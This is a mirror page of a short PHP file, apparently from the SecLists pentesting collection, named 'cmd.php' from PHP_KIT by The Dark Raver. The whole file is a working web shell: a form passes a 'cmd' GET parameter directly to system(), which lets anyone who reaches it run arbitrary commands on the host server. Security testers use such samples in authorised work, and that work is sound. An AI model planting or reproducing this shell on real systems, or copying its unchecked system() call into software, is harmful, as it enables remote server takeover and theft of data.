mirror of
https://github.com/danielmiessler/SecLists.git
synced 2024-11-10 00:27:34 +03:00
26 lines
345 B
PHP
Executable File
26 lines
345 B
PHP
Executable File
<?
|
|
//
|
|
// PHP_KIT
|
|
//
|
|
// cmd.php = Command Execution
|
|
//
|
|
// by: The Dark Raver
|
|
// modified: 21/01/2004
|
|
//
|
|
?>
|
|
<HTML><BODY>
|
|
<FORM METHOD="GET" NAME="myform" ACTION="">
|
|
<INPUT TYPE="text" NAME="cmd">
|
|
<INPUT TYPE="submit" VALUE="Send">
|
|
</FORM>
|
|
<pre>
|
|
<?
|
|
if($_GET['cmd']) {
|
|
system($_GET['cmd']);
|
|
}
|
|
?>
|
|
</pre>
|
|
</BODY></HTML>
|
|
|
|
|